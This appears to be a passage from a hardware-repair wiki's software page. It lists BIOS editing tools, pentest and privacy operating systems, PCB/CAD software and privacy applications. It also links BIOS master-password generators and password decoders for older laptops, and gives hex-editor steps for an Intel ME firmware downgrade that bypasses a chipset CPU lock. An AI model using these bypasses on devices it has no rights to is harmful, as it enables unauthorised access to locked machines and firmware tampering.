:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]&lt;br /&gt;
:::'''Award'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.&lt;br /&gt;
:::'''InsydeH2O'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]&lt;br /&gt;
:::'''Phoenix'''&lt;br /&gt;
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.&lt;br /&gt;
&lt;br /&gt;
:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]&lt;br /&gt;
&lt;br /&gt;
:::'''Tool collections'''&lt;br /&gt;
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.&lt;br /&gt;
&lt;br /&gt;
:::'''Microcode Extraction Tool'''&lt;br /&gt;
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.&lt;br /&gt;
&lt;br /&gt;
:Bios password resetting&lt;br /&gt;
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.&lt;br /&gt;
&lt;br /&gt;
::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).&lt;br /&gt;
&lt;br /&gt;
::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called &amp;quot;AMITSEDecrypt&amp;quot; to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.&lt;br /&gt;
&lt;br /&gt;
::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====HM70 PCH chipset Bypass Unsupported CPU=====&lt;br /&gt;
:Machine shuts down after 30 minutes if a '''&amp;quot;unsupported CPU&amp;quot;''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset.&amp;lt;br&amp;gt;&lt;br /&gt;
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..]&amp;lt;br&amp;gt;&lt;br /&gt;
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.&lt;br /&gt;
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium &amp;amp; Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]&lt;br /&gt;
&lt;br /&gt;
======Intel Management Engine Firmware Downgrade Attack======&lt;br /&gt;
&lt;br /&gt;
::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.&lt;br /&gt;
::Then download the Intel ME version just below the firmware version you try to downgrade.&lt;br /&gt;
::Fire up your hex editor search in your bios blob for '''&amp;quot;0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20&amp;quot;''' Intel ME 1.5M blob will start ascii text '''&amp;quot;$FPT&amp;quot;'''.&lt;br /&gt;
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.&lt;br /&gt;
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.&lt;br /&gt;
&lt;br /&gt;
::This downgrade attack &amp;lt;u&amp;gt;successfully bypassed&amp;lt;/u&amp;gt; the 30 minute shutdown restriction timer.&lt;br /&gt;
&lt;br /&gt;
:'''Required tools''':&lt;br /&gt;
::*[[Software_Tools#Hex_Editors|Hex Editor.]]&lt;br /&gt;
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine &amp;amp; Graphics Firmware Analysis Tool.&lt;br /&gt;
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.&lt;br /&gt;
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.&lt;br /&gt;
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Operating Systems====&lt;br /&gt;
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.&lt;br /&gt;
=====Mostly X86-64=====&lt;br /&gt;
======Penetration Testing &amp;amp; Digital Forensics======&lt;br /&gt;
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.&lt;br /&gt;
&lt;br /&gt;
*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.&lt;br /&gt;
&lt;br /&gt;
*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.&lt;br /&gt;
&lt;br /&gt;
*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.&lt;br /&gt;
&lt;br /&gt;
======RF Signals Analysis OS [RISC SBC &amp;amp; X86-64]======&lt;br /&gt;
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.&lt;br /&gt;
&lt;br /&gt;
======Privacy Operating System======&lt;br /&gt;
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.&lt;br /&gt;
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.&lt;br /&gt;
&lt;br /&gt;
======Windows 10 IoT LTSC======&lt;br /&gt;
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat &amp;amp; setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032. &lt;br /&gt;
&lt;br /&gt;
*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.&lt;br /&gt;
&lt;br /&gt;
======Previous Windows versions======&lt;br /&gt;
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.&lt;br /&gt;
&lt;br /&gt;
=====Embedded Devices [Network equipment]=====&lt;br /&gt;
&lt;br /&gt;
*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.&lt;br /&gt;
&lt;br /&gt;
*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.&lt;br /&gt;
&lt;br /&gt;
*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.&lt;br /&gt;
&lt;br /&gt;
=====Smartphones [Android &amp;quot;de-google&amp;quot;]=====&lt;br /&gt;
&lt;br /&gt;
*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.&lt;br /&gt;
&lt;br /&gt;
*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.&lt;br /&gt;
&lt;br /&gt;
*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.&lt;br /&gt;
&lt;br /&gt;
*[https://calyxos.org/ CalyxOS] - is a privacy-focused, &amp;quot;de-googled&amp;quot; Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.&lt;br /&gt;
&lt;br /&gt;
*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.&lt;br /&gt;
&lt;br /&gt;
*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Tools for opening CAD or Boardview files====&lt;br /&gt;
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.&lt;br /&gt;
&lt;br /&gt;
*[https://pldaniels.com/flexbv5/ FlexBV]  - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards&lt;br /&gt;
&lt;br /&gt;
*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the &amp;quot;Test_Link&amp;quot; software and &amp;quot;Landrex&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.&lt;br /&gt;
&lt;br /&gt;
*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.&lt;br /&gt;
&lt;br /&gt;
*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]&lt;br /&gt;
&lt;br /&gt;
For resources to open in your favorite boardview program visit &lt;br /&gt;
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -&amp;gt; Datasheets boardviews &amp;amp; schematics]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Custom PCB Development Software====&lt;br /&gt;
&lt;br /&gt;
=====Definition and Purpose=====&lt;br /&gt;
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.&lt;br /&gt;
&lt;br /&gt;
::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.&lt;br /&gt;
&lt;br /&gt;
::'''Integration Between CAD and EDA'''&lt;br /&gt;
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.&lt;br /&gt;
&lt;br /&gt;
=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.&lt;br /&gt;
&lt;br /&gt;
*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].&lt;br /&gt;
&lt;br /&gt;
*[https://fritzing.org/ Fritzing] -  is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.&lt;br /&gt;
&lt;br /&gt;
*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.&lt;br /&gt;
&lt;br /&gt;
*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.&lt;br /&gt;
&lt;br /&gt;
*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.&lt;br /&gt;
&lt;br /&gt;
=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.&lt;br /&gt;
&lt;br /&gt;
*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.&lt;br /&gt;
&lt;br /&gt;
*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.&lt;br /&gt;
&lt;br /&gt;
*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
====Other software====&lt;br /&gt;
&lt;br /&gt;
=====Display Driver Utilities (Windows)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).&lt;br /&gt;
&lt;br /&gt;
*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing &amp;quot;bloatware&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.&lt;br /&gt;
&lt;br /&gt;
*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively &amp;quot;trimming&amp;quot; down the install base. It's not an official Nvidia utility.&lt;br /&gt;
&lt;br /&gt;
=====Host Based Firewall [Windows FOSS]=====&lt;br /&gt;
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.&lt;br /&gt;
&lt;br /&gt;
=====Web Browsing=====&lt;br /&gt;
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.&lt;br /&gt;
&lt;br /&gt;
::Extensions &amp;amp; Configurations&lt;br /&gt;
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.&lt;br /&gt;
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.&lt;br /&gt;
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.&lt;br /&gt;
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.&lt;br /&gt;
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.&lt;br /&gt;
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.&lt;br /&gt;
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] -  is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.&lt;br /&gt;
&lt;br /&gt;
======Public Networks======&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.&lt;br /&gt;
&lt;br /&gt;
*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.&lt;br /&gt;
&lt;br /&gt;
*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.&lt;br /&gt;
&lt;br /&gt;
*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.&lt;br /&gt;
&lt;br /&gt;
*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.&lt;br /&gt;
&lt;br /&gt;
*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.&lt;br /&gt;
&lt;br /&gt;
=====Email Clients / Email Encryption Standards=====&lt;br /&gt;
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].&lt;br /&gt;
&lt;br /&gt;
*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.&lt;br /&gt;
&lt;br /&gt;
*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].&lt;br /&gt;
&lt;br /&gt;
*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.&lt;br /&gt;
&lt;br /&gt;
=====Chat Applications / Platforms=====&lt;br /&gt;
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.&lt;br /&gt;
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.&lt;br /&gt;
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.&lt;br /&gt;
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.&lt;br /&gt;
::XMPP clients &amp;amp; extensions&lt;br /&gt;
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.&lt;br /&gt;
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.&lt;br /&gt;
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.&lt;br /&gt;
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.&lt;br /&gt;
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.&lt;br /&gt;
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.&lt;br /&gt;
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.&lt;br /&gt;
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.&lt;br /&gt;
::Discord client advice&lt;br /&gt;
:::*1. Stop using the installed electron PC based version. Use the web version.&lt;br /&gt;
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).&lt;br /&gt;
&lt;br /&gt;
=====File Archiver Utilities=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.7-zip.org/ 7-Zip]  - is a free and open source file archiver.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.&lt;br /&gt;
&lt;br /&gt;
*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.&lt;br /&gt;
&lt;br /&gt;
=====Disk Encryption Software=====&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools&lt;br /&gt;
&lt;br /&gt;
*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].&lt;br /&gt;
&lt;br /&gt;
=====Image Manipulation Tools=====&lt;br /&gt;
&lt;br /&gt;
